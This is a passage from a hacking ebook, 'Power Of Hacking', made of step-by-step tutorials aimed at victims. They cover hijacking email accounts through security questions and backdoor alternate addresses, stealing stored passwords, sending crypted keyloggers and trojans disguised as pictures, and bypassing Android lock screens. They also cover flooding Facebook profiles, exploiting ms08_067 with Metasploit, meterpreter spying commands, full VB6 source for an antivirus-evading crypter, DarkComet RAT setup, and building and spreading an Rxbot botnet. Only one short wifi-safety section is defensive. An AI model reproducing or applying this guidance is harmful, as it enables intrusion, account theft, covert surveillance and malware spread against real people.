Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree account. For gmail, it will only ask you the security questions if the person hasn't logged into their account 24 hours after you submit a i cannot access my account request. 3. Once you're asked the security questions, the only thing in between you and their e-mail is the answers to said questions. Most questions are pretty easy to answer if you know the person. if you dont know them, just find out the answers. For example, one security question is What is the name of your first dog?. If you know the person, this could be an easy answer. If you don't, you could try bringing it up smoothly in a conversation, or by asking people close to the victim such as family or friends. 4. Once you've correctly answered the questions, you will be able to reset their password and gain access. Congrats :) 5. Most likely the person will end up resetting their password once they realized what has happened. If you want to leave a way for you to get back in, change their alternate e-mail. If they have an alternate e-mail as victim@yahoo.com, make an email account with the same name on another service such as yahoo, so you own an email account victim@hotmail.com and replace their alternate email with this. This way, they most likely wont notice their alternate was changed, and you can just have a password reset request sent to your new email account, allowing you to regain access :) As always, this is for educational purposes only, and is illegal to gain access to someone elses e-mail account. Only attempt this on your own accounts. Use at your own risk. Hack Tutrial:Stored passwords This tutorial will show you how to obtain all saved passwords on a computer, which may include e-mails and other accounts. This tutorial assumes you have physical access to the victims computer. 1. Download and install Cain & Able from here: http://www.oxid.it/cain.html 2. If you don't want to have to download and install software on the victims computer, a USB bootable version is available. 3. Open Cain & Abel and click on configure 4. Select the device that has an IP (192.168.1.0 for example) and make sure Don't use promisucous mode is checked. Click ok 5. On the left under the decoders tab, there should be an IE 7 passwords option. Choose that 6. Click on the blue + icon 7. You should now see all saved IE 7 passwords. You can use the other options on the left to see if you can recover any other stored passwords. 8. If the victim doesn't use IE or this method didn't work for any reason, you can google search stored password recovery and find a bunch of other tools that do similar functions. Also, see the "USB password stealer" tutorial on this website. Hack Tutrial:VIRUS METHOD
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 190
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree ONLY USE THIS METHOD IF THE OTHER METHODS DIDN 'T WORK FOR YOU , AS THIS REQUIRES A LITTLE MORE WORK ON YOUR PART . THIS METHOD REQUIRES SENDING THE VICTIM A VIRUS WHICH WILL LOG THEIR KEYSTROKES AND /OR PASSWORDS , AND SENDS THEM TO YOU . IF YOU DON 'T DO THIS WELL , ITS POSSIBLE YOUR VIRUS CAN BE DETECTED AND REMOVED BY THE PERSONS ANTIVIRUS SOFTWARE. THIS METHOD REQUIRES : *A TROJAN OR KEYLOGGER OF YOUR CHOICE. WWW.HACKFORUMS .NET IS A GOOD RESOURCE FOR FINDING THIS . THERE ARE HUNDREDS OF DIFFERENT PROGRAMS YOU CAN USE *A CRYPTER . C RYPTING YOUR VIRUS IS ESSENTIAL IF YOU DON'T WANT YOUR VIRUS DETECTED BY AN ANTIVIRUS PROGRAM. Y OU CAN USE THE SAME LINK AS ABOVE TO FIND ONE , OR YOU CAN EVEN PAY SOMEONE ELSE LIKE $5 ON THOSE FORUMS TO CRYPT YOUR VIRUS OR KEYLOGGER FOR YOU . IF YOUR VICTIM DOESN 'T HAVE ANTIVIRUS , YOU MAY SKIP THIS , BUT IT'S NOT RECOMMENDED . *A BINDER . NOT REQUIRED BUT THIS WILL BE USEFUL IF YOU WANT TO ATTACH YOUR VIRUS TO SAY A PICTURE FILE . THIS WAY YOUR NOT JUST SENDING SOMEONE A .EXE WHICH WILL SEEM MORE SUSPICIOUS THEN IF YOU SENT THEM A LEGIT PICTURE FILE , WHICH HAPPENS TO HAVE A VIRUS ATTACHED TO IT . THE PERSON WOULD NEVER KNOW . YOU SENT THEM A VIRUS. AGAIN USE GOOGLE OR THE ABOVE LINK TO FIND ONE OF THESE , THERE ARE MANY . 1. First step is finding the trojan or keylogger of your choice. A trojan essentially is a virus that gives you access to a persons computer, and control/monitor a number of things, almost as if you were sitting at the computer itself. There are many different kinds, each with their own features and functions; most include a keylogger. A keylogger is a type of program or virus that simply monitors every key pressed and saves it into a log, which you can then access. www.hackforums.net is a good resource to find one of these, and its really up to you which you use, the steps will all be the same. 2. Once you have your trojan server created, you need to have it crypted. This will help prevent your virus from being detected by antivirus. You can either find your own crypter or pay someone a small fee to crypt your virus for you. Search around online for this, as there are many out there. 3. Once you have a crypted virus, you may now use a binder if you like, to combine your virus with another program or file such as a picture. This is recommended, because an jpeg is a lot less suspicious than a .exe file 4. Now that everything is ready, send your victim the file! You can trick them and tell them its a cool picture, or host the file on a free host somewhere online and have them download it saying its a cool new song. Your method of getting the file to them is up to you and how creative you can be. Another way is to install it yourself, if you have access to their computer. Just put the file on a flash drive and install it when they aren't around. 5. Once they're infected, you can use the trojan/keylogger program to monitor their PC. The possibilities from here are practically endless, and mostly depend on what kind of trojan/keylogger you used. As always, this is for educational purposes only. It is illegal to send viruses. Use at your own risk. Hack Tutrial:BYPASSING SCHOOL SECURITY This tutorial will walk you through some methods for bypassing basic school security (the kind that stops you from accessing certain websites, or downloading certain files.) Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 191
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Bypassing the restriction to download .exe files 1. Simply google the file you want, only in zip format. For example, instead of searching for openoffice.exe, search for openoffice.zip or openoffice.rar Bypassing blocked keywords 1. If your school doesn't allow you to search certain keywords like torrents, porn, etc. simply drop a letter from your keyword search. For example, instead of typing Harry Potter torrents, search Harry Potter torren Bypassing blocked websites 1. Most people know this one by now. If there is a certain website you want to access but it is blocked, try searching the website in google, and instead of click on the website itself, click on the cached button. This should load the website without the block. 2. The alternative is to use a proxy if you can. Refer to the Protect yourself section of this app to find the proxy guide. You can also google search proxy websites. Use facebook or other blocked apps w/ iPhone or iPad on school WiFi 1. Send an email to promotion@vpnod.com with the subject vpnod (There doesn't have to be an text in the body, wait for a reply, then follow the instructions at http://www.vpnod.com/setup/ios/ Run a TOR browser off a USB stick (TOR is an anonymous browser.. you can also view things with it you couldn't normally. View their website or do a google search for details) 1. Download this folder: https://www.torproject.org/dist/torbrowser/tor-browser2.2.32-4_en-US.exe 2. Then copy it onto a USB stick, and simply plug it into your schools computer and run the program called Start Tor Browser As always, this tutorial is for educational purposes only. Use at your own risk. Hack Tutrial:1000 hack books http://www.hackershandbook.org/1000/ Hack Tutrial:BYPASS ANDROID LOCK SCREEN This tutorial was submitted by: Glitch 3455 What you need: *Windows or Linux based PC *Android screenlockbypass.apk - Download here: http://www.4shared.com/android/LujcLeDY/securityandroidscreenlockbypas.html *ADB - Download here: https://dl.dropbox.com/u/90610771/adb.rar This will be much easier if your target device has usb debugging enabled. If usb debugging is enabled on target phone: Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 192
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 1. Plug the phone into the computer and wait for the drivers to install 2. Open a command prompt(windows)/shell(linux) and CD (change directory) to the directory where adb is located and run: adb install (the directory where screenlockbypass is located.) se.curity.android.screenlockbypass.apk 3. Then install any other .apk the same way and the lockscreen should disappear. 4. If usb debugging isn't enabled: This will still work but it will take a little longer and be a bit more difficult. Hopefully your target device is rooted and has a custom recovery(to check turn the device off hold: Home + vol dn + PWR on most devices if it says CWM based recovery somewhere at the bottom or top you definitely have a custom recovery.), if not it will still work but you will have to flash a custom recovery on the device. Seeing how all devices are different you will have to Google a way to flash a recovery to the specific device you have. If/Once there is a custom recovery on the device boot into recovery (hold: Home + vol dn + PWR on most devices) 1. Connect the device to the computer and open a command prompt/shell, CD to the directory where adb is located and run: adb shell 2. You should see a # then run: busybox mount system 3. Then type exit and hit enter. 4. Now type: adb push (the directory where screenlockbypass is located)se.curity.android.screenlockbypass.apk system/app 5. Push any other .apk the same way, and when you turn your phone on the lockscreen should pop up for a brief moment and disappear. Hack Tutrial:Flood Facebook This guide will show you how to flood a persons facebook wall, comments, and messages. What is flooding? Basically spamming the same thing over and over really quickly, i.e. 1000 wall posts in 1 minute. What this requires: *A facebook account and a target *Auto Clicker (download here: http://www.shockingsoft.com/AutoClicker.html) *A computer with internet 1. Login to your Facebook account. Then after logging in, open another tab/window then go to m.facebook.com 2. Go to friends, then type your slave's name then click Search. Now go to your targets profile. Wallpost Flood Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 193
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 1. Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks. 2. Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the Post button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar. 3. Now after you saw the progress of click at the taskbar, place your cursor on the Post button. 4. Now leave your cursor on the Post button while the Auto-Clicker runs. Leave it for atleast a minute. 5. Finished. Comment Flood 1. Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks. 2. Click your targets profile picture or message you want to flood. 3. Pick a photo you want to comment on. (You can use Next and Previous Button to Navigate to his other Profile Pics.) 4. Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the Comment button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar. 5. Now after you saw the progress of click at the taskbar (see picture) place your cursor on the Comment button. 6. Now leave your cursor on the Comment button while the Auto-Clicker runs. Leave it for atleast a minute. 7. Finished. Message Flood 1. Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks. 2. Click Messages beside his profile picture. 3. Put anything in the Subject and Body Message. 4. Then press F2. NOTE: Don't put your cursor on the Send button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the AutoClicker at your taskbar. 5. Now after you saw the progress of click at the taskbar (see picture) place your cursor on the Send button. 6. Now leave your cursor on the Send button while the Auto-Clicker runs. Leave it for atleast a minute. 7. Finished Hack Tutrial:Wifi security Another way your making all your accounts easily hacked, is by being connected to an insecure wifi, or connected to a wifi with an easily hacked password. 1. Use free public wifi at your own risk. Anyone connected to the same wifi as you with malicious intent can sniff the traffic over the network and have access to any Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 194
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree account you log in to. Facebook, youtube, online banking... anything. Only access accounts you care about on wifi networks you trust.
2. DO NOT use WEP for your router security, use WPA or preferably WPA2. WEP keys are extremely easy to hack (which this ebook will cover) and once someones on your network... read #1.
3. If your router has WPS enabled (wireless protected setup), DISABLE IT. An exploit allows WPS to be cracked pretty quickly allowing the attacker to figure out your WPA2 key.
4. If you think someone on your network may be trying to access your accounts, browse using HTTPS. Most popular websites support HTTPS (facebook, gmail, etc) and this prevents most network sniffing applications fail to retrieve your account info. You can use the HTTPS version of a website simply by replacing HTTP to HTTPS in the url. Example: https://facebook.com instead of http://facebook.com. Some hacks out there can redirect you from the secure HTTPS to HTTP, so if you're onsure of the network you're connected to, stay aware of the URL.
5. Don't buy things online while connected to a public network. Just don't do it.
Hack Tutrial:FUD CRYPTER This tutorial will walk you through using a FUD (fully undetectable) crypter. This is used once you have created a trojan virus, and would like to send it to the target without it being detected by anti-virus. As more people use this method, it may become detectable in the future. It's 100% FUD as of 10/14/2011. Note: This only works with RATs (remote access tools aka trojans) that have a .net coded .exe file. 1. 2. 3. 4.
Google search and download the programmed called .netshrink For the input file, select your trojan .exe file. For output file, enter the new destination for your virus. Test to make sure its undetectable by uploading it to http://vscan.novirusthanks.org/ and viewing the report. As always, this tutorial is for educational purposes only and should be used at your own risk.
Hack Tutrial:Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 195
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree USING METASPLOIT THIS TUTORIAL WILL WALK YOU THROUGH HACKING INTO A COMPUTER ON YOUR NETWORK USING A PROGRAM CALLED METASPLOIT . THIS PROGRAM IS BUILT INTO BACKTRACK 5, SO THAT IS WHAT I'LL BE USING IN THIS TUTORIAL. Y OU CAN FIND OUT WHERE TO GET BACKTRACK 5 AND HOW TO SET IT UP IN THE HACKING WIF I SECTION OF THIS APP. WHAT YOU NEED : *L INUX OT BACKTRACK 5 ( SEE HACKING WIFI SECTION OF THIS APP FOR INSTRUCTIONS ) *BE ON THE SAME NETWORK AS THE PC TARGET
1. First, we're going to create a username and password for our metasploit data base. To do this, open the command window and enter in: service postgresql start If you're using an older version of backtrack, the command will be /etc/init.d/postgresql-8.3 start or if that doesn't work, change the 8.3 to 8.4 2. Next, enter the following code: (if you're using backtrack, ignore the sudo commands) sudo su postgres -c psql ALTER USER postgres WITH PASSWORD 'your password'; q sudo passwd -d postgres sudo su postgres -c passwd 3. What this does is set up a user postgres with whatever password you choose. Now to create/connect to the postgresql database in metasploit you need to use the commands. Once inside metasploit enter: db_connect postgres:yourpassword@127.0.0.1/msf3 4. This will create a postgresql database called msf3 if you haven't already. If you have it will just connect to it. This is where the show really gets going. Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan. To use a ping scan with nmap you would use nmap from the db_nmap command because it automatically adds hosts in the network to your new postgresql database. b_nmap -Pn -v 192.168.1.1-255 5. Now the -Pn argument tells nmap to run a ping scan on port 80 to decide what hosts are up and will add them to your database, while the -v command tells nmap to run in verbose mode giving you more detailed feedback while the scan is running. Now after you have a list of live hosts you can run nmap in a new mode. db_nmap -sS -sV -sU -n -O -v 192.168.1.4 6. NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND. THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 196
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 7. Now i run the ip 192.168.1.4 because that is what is currently on my network. The -sS command runs a stealth syn scan which does not create a full tcp connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port which will come into play when selecting an exploit to use. The -sU command runs a udp port scan against the target, and since there is no reply from udp packets they never get logged in the first place. The -O scan runs an OS scan against the target using tcp fingerprinting to tell you the operating system of the target machine, this will also come to play when selecting an exploit. The -n command tells nmap to not run a -Pn or ping scan agianst the target as they get logged, and since you have already done that once you wouldn't want to do it again. And again the -v command runs nmap in verbose mode which allows you to see more of whats going on in the behind the scenes and helps you better understand what is happening. Now once you have a list of open ports you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit. Now since port 445 is open I will attempt to run the ms08_067_netapi exploit against the target. So with metasploit open we will run use windows/smb/ms08_067_netapi set payload windows/bind_tcp set rhost 192.168.1.4 set lhost 192.168.1.3 set lport 5150 check 8. NOTE:Run the show options command to display what information is required for the exploit to work properly. 9. Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit. The second sets metasploit to use a bind shell using tcp protocal. 10. The third sets the remote host to our target ip. The fourth sets the localhost to our ip, and the local port the one we want to listen on. Running the check command will tell us if the target is vulnerable or not. And as you can see it is. So now we will run the exploit command exploit 11. From there meterpreter will open... and congrats... you're in! View the next tutorial in this section for the different meterpreter commands you can use to manipulate the target. This tutorial is for educational purposes only. Hack Tutrial:METERPRETER COMMANDS
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 197
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree This tutorial is a continuation of the previous Using metasploit tutorials, and will list the different commands you can use to manipulate the target PC you've hacked into. Most interesting commands: meterpreter > getuid (this will show you currently logged in user) meterpreter > idletime (wanna see how long user has afk?) meterpreter > help (this will show you a massive list of amzing commands to use!) meterpreter > use priv (then check help again, more privilidged commands now eh?) meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer) meterpreter > download secret.txt secret.txt (downloads the txt file to our machine) meterpreter > cd Documents and settings (cd's to a folder with spaces in it.) meterpreter > ls (this is an example of the bash type commands we have on the target win machine, version of dir) meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire My Docs folder over to us. meterpreter > execute -f evil.exe (executed the file on the customer) meterpreter > execute -f cmd.exe -c -H -i (-f executes, cmd.exe shell on target, channelized, hidden, interactive) (customer will not see a thing your doing as all the options are set properly) All commands: Core Commands == Command Description -- -- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel exit Terminate the meterpreter session help Help menu interact Interacts with a channel irb Drop into irb scripting mode migrate Migrate the server to another process quit Terminate the meterpreter session read Reads data from a channel run Executes a meterpreter script use Load a one or more meterpreter extensions write Writes data to a channel Stdapi: File system Commands == Command Description -- -- cat Read the contents of a file to the screen cd Change directory del Delete the specified file download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands == Command Description -- -- ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands == Command Description -- -- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Get as many privileges as possible getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands == Command Description -- -- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components Stdapi: Webcam Commands == Command Description -- -- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam Priv: Elevate Commands == Command Description --- getsystem Attempt to elevate your privilege to that of local system. Priv: Password database Commands == Command Description -- -- hashdump Dumps the contents of the SAM database Priv: Timestomp Commands == Command Description -- -- timestomp Manipulate file MACE attributes Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 198
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Tutrial:CREATING A CRYPTER This tutorial was submitted to us by the member thatguyuno. Credits and thanks goes to him! How To Make a crypter ? What you will need: Visual Basic 6 or Visual Basic 6 Portable A RC4 module A brain The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial. TABLE OF CONTENTS: 1. Introduction 2. Building your crypter 3. Conclusion 1. Introduction RC4: In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks). Stub: A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing. Builder: A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file. 2. Building your crypter. Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub. Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it. Code: With commondlg 'CommonDialog1. .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe) .DialogTitle = "Please select a executable file..." 'The title of the dialog. .ShowOpen 'Show the dialog. End With TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename. The With commondlg command calls CommonDialog1. The .Filter part allows you to choose what files you only want to be selected. The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting). The .ShowOpen command shows the dialog. End With will end CommonDialog1. And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename. Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says. Code: Dim sStub As String, sFile As String 'This command will declare the two strings. Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub. sStub = Space(LOF(1)) 'This declares the space. Get #1, , sStub 'This puts in a space in the file. Close #1 'This closes the file. Open TextBox1.Text For Binary As #1 'Opens up the stub. sFile = Space(LOF(1)) 'This declares the space. Get #1, , sFile 'This puts a space in the file. Close #1 'This closes the file. Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe". Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option. Close #1 'This closes the file. MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file. Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding. Code: Const FileSplit = "<@#@>" 'The file split. Const Pass = "s0rasRC4Tutorial" 'The RC4 password. For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password. Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain: Code: Const FileSplit = "<@#@>" 'The file Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 199
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree split. Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder! Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command. Public Sub Main() 'The main part of the stub. Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder. Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file. sStub = Space(LOF(1)) 'This will declare the space. Get #1, , sStub 'This puts a space in the file. Close #1 'This closes the file. sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub. Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder. Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password. Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder. End Sub 'This ends "Public Sub Main()". The code will be teaching you. Once you're done, remove the Form1. 3. Conclusion I hope you liked this tutorial, and I hope you learned a lot about crypting Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5 RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398 Hack Tutrial:USING DARKCOMET This tutorial will walk you through setting up a Remote Administration Tool (aka RAT or trojan) which you can use to send to your victim. Once they open your RAT file, you'll be able to access and control their computer as if you were sitting at it, download and execute files, retrieve saved passwords, look through their webcam, keylog, and more. What you need: *DarkComet RAT (download latest version here: http://www.darkcometrat.com/downloaddc.dc ) *Sand Boxie *optional* (download here: http://www.sandboxie.com/SandboxieInstall.exe ) *If you're behind a router, you need to port forward 1604 *Disble your Anti-Virus 1. Download DarkComet from the link above and open DarkComet.exe. If your antivirus isn't turned off, it may flag this program as a virus. This is just a false positive, because the program is used to create viruses. 2. Click DarkComet-RAT drop-down menu in the top left corner, then click Server Module > Minimalist 3. Make the Stub ID whatever you want. 4. For IP/DNS, put in your ACTUAL IP address, not your router IP. You can find your IP address by going to http://www.whatsmyip.org/ 5. Click the "Normal" button in the top left corner, choose a name for your server file and save it somewhere. 6. If you haven't forwarded port 1604 yet, DO IT NOW. You can do this by typing your router IP address into your browser (usually 192.168.0.1 or 192.168.1.1) and logging into your router. Find the port forwarding option (every router is different) and forward port 1604 to your PC. If you don't know how to port forward, google port forwarding for your router or look in the manual for instructions. If you're not behind a router and are directly connected into your modem, this won't matter for you. 7. Download and open SandBoxie. This is what we'll use to test the server safely on yourself to make sure it works. Make sure DarkComet is still open, and drag your Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 200
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree newly created server file into the SandBoxie window. If prompted, choose to open on Default box. Once the server runs in SandBoxie, you should see a pop-up Dark Comet window letting you know a victim has connected. If nothing happens, you did something wrong (most likely ports aren't forwarded correctly) 8. In the Dark Comet window, double click the victim that appeared in the list (you). You'll now see all the options available for you in the list on the left. 9. Now all you do, is send your server file to your victim and when they open it, you'll have full access to them. NOTE: Anti-Virus programs will flag your server, so your victim must not have any anti-virus software. To get around this, you need to crypt your server with a FUD (Fully-UnDetectable) Crypter. Anti-Virus programs are being updated all the time so a crypter that worked a month ago may not be FUD anymore. You must search around for crypters online through google or youtube, or create your own using the tutorial provided in this app. You may also choose to bind your server to an image file for example, to make it less suspicious, or you could send it using a java drive by. Creating a server is only the first step to successfully hacking your victims, the more time you spend working on it, the higher your chances of success. Hack Tutrial:CREATING A BOTNET This tutorial uses mIRC and other tools, which you will need to download. You can find them via google or through pirating methods listed in the Misc Hacks section of this app. Q:What is a botnet? A: A botnet is where you send a trojan to someone and when they open it a bot joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a zombie. Depending on the source you used, the bot can do several things. Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC Takeovers. Once again depending on the bot it may be able to kill other fellow competeter bots. Or even kill AV/FW apon startup. Add itself to registry. Open sites. Open commands. Cmd, notepad, html, Anything is possible ! Theres the infected computers bots the attacker, the server, and the slave. Quote: while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 201
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community. Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs. Botnets are being used for Google Adword click fraud, according to security watchers. Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. 1. 2. 3. 4. 5. 6.
Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb) Download and install the Service pack 6 Download and install Windows SDK Open up Microsoft Visual C++ Compilier 6.0 Go to Tools > Options and Click the Directories tab Now, browse to these directories and add them to the list: (Click the dotted box to add)
C:PROGRAM FILESMICROSOFT PLATFORM SDK C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB 7. Make sure they're in the order above (use the arrows to adjust the order) 8. Download Rxbot 7.6 9. Open the Rxbot 7.6 > configs.h folder and edit these lines only: Put in quotations: char password[] = Bot_login_pass; // bot password (Ex: monkey) char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net) char serverpass[] = ; // server password (not usually needed) char channel[] = #botz_channel; // channel that the bot should join char chanpass[] = My_channel_pass; // channel password
10. 11. 12. 13. 14.
Optional: char server2[] = ; // backup server char channel2[] = ; // backup channel char chanpass2[] = ; //Backup channel pass Make sure Microsoft Visual C++ is open Select File > Open Workspace Browse to your Rxbot 7.6 folder and open the rBot.dsw file Right Click rBot Files and click Build: rBot.exe will be in the Rxbot 7.6 > Debug folder !!! YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click Protect and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 202
